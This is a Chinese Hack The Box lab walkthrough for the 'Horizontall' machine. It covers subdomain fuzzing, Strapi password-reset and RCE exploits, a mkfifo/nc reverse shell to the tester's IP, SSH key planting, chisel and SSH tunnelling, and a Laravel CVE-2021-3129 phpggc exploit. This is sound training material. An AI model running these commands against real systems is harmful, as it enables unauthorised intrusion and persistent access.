【Hack The Box】linux练习-- Horizontall

news2024/11/28 6:35:10

HTB 学习笔记

【Hack The Box】linux练习-- Horizontall

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • HTB 学习笔记
    • 信息收集
        • 爆破目录
        • http://api-prod.horizontall.htb/admin
    • ssh转发端口

在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

添加horizontall.htb
在这里插入图片描述
html美化器,发现所有源码都在一行,所以那个美化器美化一下
https://beautifytools.com/html-beautifier.php
在这里插入图片描述

<!DOCTYPE html>
<html lang="">

<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width,initial-scale=1">
	<link rel="icon" href="/favicon.ico">
	<title>horizontall</title>
	<link href="/css/app.0f40a091.css" rel="preload" as="style">
	<link href="/css/chunk-vendors.55204a1e.css" rel="preload" as="style">
	<link href="/js/app.c68eb462.js" rel="preload" as="script">
	<link href="/js/chunk-vendors.0e02b89e.js" rel="preload" as="script">
	<link href="/css/chunk-vendors.55204a1e.css" rel="stylesheet">
	<link href="/css/app.0f40a091.css" rel="stylesheet">
</head>

<body>
	<noscript><strong>We're sorry but horizontall doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript>
	<div id="app"></div>
	<script src="/js/chunk-vendors.0e02b89e.js"></script>
	<script src="/js/app.c68eb462.js"></script>
</body>

</html>

但是也没啥东西
我将使用wfuzz爆破域名

wfuzz -u http://horizontall.htb -H "Host: FUZZ.horizontal.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hc 301

得到一个新的域名
api-prod.horizontall.htb
在这里插入图片描述

爆破目录

feroxbuster -u http://api-prod.horizontall.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

这里用别的字典也可以,我只是顺手用了dns的词典

得到结果

200       16l      101w      854c http://api-prod.horizontall.htb/admin
403        1l        1w       60c http://api-prod.horizontall.htb/users
200        1l       21w      507c http://api-prod.horizontall.htb/reviews

得到了两个新的目录

 http://api-prod.horizontall.htb/admin
 http://api-prod.horizontall.htb/reviews

有几个用户应该

wail
doe
john

在这里插入图片描述

http://api-prod.horizontall.htb/admin

是一个strapi
在这里插入图片描述搜索一下
在这里插入图片描述
有需要凭证的rce,也有修改密码的py脚本
在这里插入图片描述
在50237脚本中我发现了他是如何获取版本信息的
在这里插入图片描述所以得到本本信息
strapiVersion “3.0.0-beta.17.4”

而后利用exp-50237
修改这三个参数
在这里插入图片描述密码已经被成功修改
在这里插入图片描述
然后我用admin做账号,自己设置的密码做密码
登陆

在这里插入图片描述
那现在有了凭证就尝试rce

python3 50239.py http://api-prod.horizontall.htb

看不到回显,所以直接反弹端口
在这里插入图片描述我在本地开启了一个

tcpdump -ni tun0 icmp

在获得的shell上

ping -c 1 10.10.14.29

在这里插入图片描述
正常收到ping
所以
执行反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.7 443 >/tmp/f

在这里插入图片描述
还有developer这个用户
home目录打不开

在这里插入图片描述composer-setup.php文件表明这里使用了某种 PHP 站点。

看着 netstat,在 80 上有站点,在 1337 上有 NodeJS 端。在 3306 上还有 MySQL(这是有道理的)。 但是 8000 上还有一些东西:

netstat -tnlp
在这里插入图片描述
所以我们利用chisel搭建一个隧道
搭建到目标的8000

./chisel server -p 6666 --reverse
./chisel client 10.10.14.29:6666 R:9999:127.0.0.1:8000

在这里插入图片描述
在这里插入图片描述
这是火狐的设置问题

url栏about:config

在这里插入图片描述首选项输入

network.security.ports.banned.override

在这里插入图片描述
选择字符串的数据类型,添加一个6666
但是chisel没得到
页面显示notfound,那就尝试ssh转发

ssh转发端口

mkdir .ssh
cd .ssh

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqF5b+x6SW++Mf1ptV7LmcZq3jzx1AO66z3zambSB3+2wD/t5Z8G642Wt6cso4tOGvB5bp9fYymmt05RloZa5EM5xfihLbknFZPjxu4WniT7ZqeIbOcFe+Z/4BZnkwNuEVRrXK8n4neymZHAcfwunO0Md3fel86t8WZNbejzzRIPt81S6EGhEuhH9xvHJ0AZNbg3v3W/tfDsq3cCtQo4Plt2TYVKh6Xcff4jeLBjqiInvq2OkLWRDyjDZS2fk/SCzTqnJU5ehQeK3iE2zNSC5rmFLs9ApzmjnAUQmqTWblBzFvTTa/FjOhGjSogRPcYBojqnCpuMxV6Y04Lw6g+CdKSUX2kMueoLqJMaCPqYtsGRGcaQazeqwSV+4m1kctdEKhKztFKtVGlEXjz+mIfcvEmh5zIZxGdYEuLBa7CRVc9CMWDri+Sy97Xiep08FMGzoNYyPwQjkiIFCV75/KGcyqjllfC+hEabIMol9xplqCsLJI51/eRDrUC32F/kD3YZE= root@kali" > authorized_keys

注意,必须在用户目录下创建.ssh目录

ssh -i id_rsa strapi@10.129.165.246 -L 8000:localhost:8000

在这里插入图片描述Laravel v8 (PHP v7.4.18)

使用下面这个exp可以很方便,但这需要墙,我的kali制作的proxychain,是用不了的
https://github.com/nth347/CVE-2021-3129_exploit

1. 下载phpggc
https://github.com/ambionics/phpggc
下面的代码示例是下载到了/opt
2. 下载py脚本
https://github.com/ambionics/laravel-exploits
3. 生成php反序列化char文件
php -d'phar.readonly=0' /opt/phpggc/phpggc --phar phar -o id.phar --fast-destruct monolog/rce1 system id
最后的id是命令,可以修改
4. 利用脚本
python3 exp.py http://127.0.0.1:8000 /opt/phpggc/id.phar

同理,把id换成反弹shell命令也可以
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/41974.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Spring Cloud和Dubbo有哪些区别?

Spring Cloud和Dubbo有哪些区别?

Spring Cloud Spring Cloud是⼀个微服务框架&#xff0c;提供了微服务领域中的很多功能组件&#xff0c;并且Spring Cloud是⼀个⼤⽽全的框架 Dubbo Dubbo⼀开始是⼀个RPC调⽤框架&#xff0c;核⼼是解决服务调⽤间的问题 对比&#xff1a; Dubbo则更侧重于服务调⽤&#x…
阅读更多...
Nuxt 3.0.0正式发布,集成Element Plus、Ant Design Vue和Arco Design Vue脚手架

Nuxt 3.0.0正式发布,集成Element Plus、Ant Design Vue和Arco Design Vue脚手架

发布说明 Nuxt 是使用简便的 Web 框架&#xff0c;用于构建现代和高性能的 Web 应用&#xff0c;可以部署在任何运行 JavaScript 的平台上。 Nuxt 3.0 11天前正式发布了稳定版&#xff0c;3.0 基于 Vue 3&#xff0c;为 TypeScript 提供了 “一等公民” 支持&#xff0c;并进行…
阅读更多...
java面试强基(13)

java面试强基(13)

前文链接(61条消息) java面试强基&#xff08;12&#xff09;_一个风轻云淡的博客-CSDN博客https://blog.csdn.net/m0_62436868/article/details/128047427?spm1001.2014.3001.5501 何为反射&#xff1f;反射机制优缺点&#xff1f; ​ 它赋予了我们在运行时分析类以及执行类…
阅读更多...
Jenkins部署与基础配置(1)

Jenkins部署与基础配置(1)

5 Jenkins 部署与基础配置 IP地址角色172.18.8.19jenkins-master172.18.8.29jenkins-node1172.18.8.39jenkins-node2 [rootjenkins-master ~]# tail -n1 .bashrc PS1\[\e[1;32m\][\[\e[0m\]\[\e[1;32m\]\[\e[1;33m\]\u\[\e[34m\]\h\[\e[1;31m\] \w\[\e[1;32m\]]\[\e[0m\]# [r…
阅读更多...
ISCTF新生赛(引用传递简单社工)

ISCTF新生赛(引用传递简单社工)

猫和老鼠 反序列化题目&#xff1a; <?php //flag is in flag.php highlight_file(__FILE__); error_reporting(0);class mouse { public $v;public function __toString(){echo "Good. You caught the mouse:";include($this->v);}}class cat {public $a;p…
阅读更多...
05 Pod:如何理解这个Kubernetes里最核心的概念?

05 Pod:如何理解这个Kubernetes里最核心的概念?

文章目录1 为什么要有pod?2. 为什么Pod 是 Kubernetes 的核心对象&#xff1f;3. 如何用YAML描述Pod?3.1 Pod的基本组成部分3.1.1 最重要的 spec.containers 字段使用3.1.1.1为什么要定义容器启动时要执行的命令&#xff1f;4. 如何使用kubectl 操作Pod?4.1 创建pod4.2 删除…
阅读更多...
数据结构与算法之查找算法

数据结构与算法之查找算法

数据结构与算法——查找算法 本文将不断更新查找有关算法&#xff0c;由于精力有限&#xff0c;因此本博文将分多次更新&#xff0c;感谢您的关注 文章目录数据结构与算法——查找算法1. 二分法查找&#xff08;折半查找&#xff09;1.1 算法叙述1.2 实例说明2. 插值查找&#…
阅读更多...
【ML特征工程】第 8 章 :自动化特征化器:图像特征提取和深度学习

【ML特征工程】第 8 章 :自动化特征化器:图像特征提取和深度学习

&#x1f50e;大家好&#xff0c;我是Sonhhxg_柒&#xff0c;希望你看完之后&#xff0c;能对你有所帮助&#xff0c;不足请指正&#xff01;共同学习交流&#x1f50e; &#x1f4dd;个人主页&#xff0d;Sonhhxg_柒的博客_CSDN博客 &#x1f4c3; &#x1f381;欢迎各位→点赞…
阅读更多...
[2022-11-26]神经网络与深度学习第5章 - 循环神经网络(part 2)

[2022-11-26]神经网络与深度学习第5章 - 循环神经网络(part 2)

contents循环神经网络(part 2) - 梯度爆炸实验写在开头解决方式概览梯度爆炸实验梯度打印函数思考&#xff1a;什么是范数、L2范数、为什么要打印梯度范数复现梯度爆炸现象使用梯度截断解决梯度爆炸问题思考&#xff1a;梯度截断解决梯度爆炸问题的原理&#xff1f;写在最后循环…
阅读更多...
搭建MinIO容器

搭建MinIO容器

文章目录1 问题背景2 资源准备3 安装Docker服务4 关闭防火墙5 以Docker方式安装MinIO6 访问MinIO1 问题背景 玩一个前后端的项目&#xff0c;需要用到对象存储器&#xff0c;于是使用开源的MinIO。期间以Docker方式搭建遇到某些坑&#xff0c;此处仅以博客的方式记录下来 2 资源…
阅读更多...
【通信原理课设--基于MATLAB/Simulink的2ASK数字带通传输系统建模与仿真】Simulink的使用介绍以及在本实验中的使用

【通信原理课设--基于MATLAB/Simulink的2ASK数字带通传输系统建模与仿真】Simulink的使用介绍以及在本实验中的使用

目录 Simulink的简要介绍 Simulink的使用流程 进入Simulink 进入模型编辑窗口 ​ 建立一个新的文件 根据求需建立模型 对选择的模块进行参数设置 本次课程设计需要使用Simulink做ASK的仿真处理&#xff0c;那么下面就一起学习了解一下Simulink吧&#xff01; Simuli…
阅读更多...
全球经济自由度1995-2021最新版绿色金融指数2001-2020

全球经济自由度1995-2021最新版绿色金融指数2001-2020

&#xff08;1&#xff09;全球经济自由度指数 1995-2021 1、数据来源&#xff1a;美国传统基金会 2、时间跨度&#xff1a;1995-2021 3、区域范围&#xff1a;全球 4、指标说明&#xff1a; 经济自由度指数&#xff0c;是由《华尔街日报》和美国传统基金会发布的年度报告…
阅读更多...
爱站网关键词挖掘工具-长尾关键词挖掘站长工具

爱站网关键词挖掘工具-长尾关键词挖掘站长工具

长尾词挖掘免费工具&#xff0c;为什么我们要使用长尾词挖掘免费工具&#xff0c;我们只要找准关键词就等于掌握了流量。 关键词可应用于任何平台&#xff1a;不管是网站、短视频、自媒体等&#xff01; 比如说用户A经常看体育领域的内容&#xff0c;平台就会给A打上体育领域标…
阅读更多...
LeetCode刷题---19. 删除链表的倒数第 N 个结点(双指针-快慢指针)

LeetCode刷题---19. 删除链表的倒数第 N 个结点(双指针-快慢指针)

文章目录一、编程题&#xff1a;142. 环形链表 II&#xff08;双指针-快慢指针&#xff09;1.题目描述2.示例1&#xff1a;3.示例2&#xff1a;4.示例3&#xff1a;5.提示&#xff1a;6.进阶&#xff1a;二、解题思路1.思路2.复杂度分析&#xff1a;3.算法图解三、代码实现总结…
阅读更多...
[附源码]计算机毕业设计springboot班级事务管理论文2022

[附源码]计算机毕业设计springboot班级事务管理论文2022

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…
阅读更多...
MQTT协议

MQTT协议

1.MQTT基础知识学习 MQTT协议基础知识视频学习资源:太极创客 太极创客的MQTT基础篇博文目录链接:零基础入门学用物联网 – MQTT基础篇 – 目录 备注:建议先学习一下MQTT的基础知识后再学习下面章节部分的内容。 2.MQTT服务器的搭建 MQTT服务器的搭建步骤如下: 使用docker pull…
阅读更多...
【vue + echarts】图表自适应缩放(跟随浏览器的窗口缩放,项目侧边栏折叠后的窗口缩放),图表重绘

【vue + echarts】图表自适应缩放(跟随浏览器的窗口缩放,项目侧边栏折叠后的窗口缩放),图表重绘

效果图: 先清楚两个东西,浏览器窗口的缩放和项目侧边栏折叠后窗口的缩放,这两个是不一样的 第一种,浏览器窗口缩放后,当前窗口会放大了或者缩小了,这时会走浏览器缩放的代码部分, 第二种,而项目侧边栏折叠后窗口的缩放,虽然项目里面的窗口缩放了,但是,浏览器的窗口并没有发生…
阅读更多...
tACS恢复老年人认知控制能力的EEG功能和DTI结构网络机制

tACS恢复老年人认知控制能力的EEG功能和DTI结构网络机制

认知控制能力是大多数日常任务中的关键能力&#xff0c;与年龄相关的认知控制能力下降威胁到个人的独立性。作者之前在老年人和年轻人中都发现&#xff0c;经颅交流电刺激&#xff08;tACS&#xff09;可以改善认知控制&#xff0c;在远离受刺激部位和频率之外的神经区域观察到…
阅读更多...
使用python玩转二维码!速学速用!⛵

使用python玩转二维码!速学速用!⛵

&#x1f4a1; 作者&#xff1a;韩信子ShowMeAI &#x1f4d8; Python3◉技能提升系列&#xff1a;https://www.showmeai.tech/tutorials/56 &#x1f4d8; 本文地址&#xff1a;https://showmeai.tech/article-detail/398 &#x1f4e2; 声明&#xff1a;版权所有&#xff0c;…
阅读更多...
前端开发如何做新手引导

前端开发如何做新手引导

通常&#xff0c;在产品发布新版本或者有新功能上线时&#xff0c;都会开发一个新手引导功能来引导用户了解应用的功能。在前端开发中&#xff0c;如何快速地开发新手引导功能呢&#xff0c;下面介绍几个开箱即用的新手引导组件库。 1&#xff0c;Intro.js Intro.js是一个使用…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023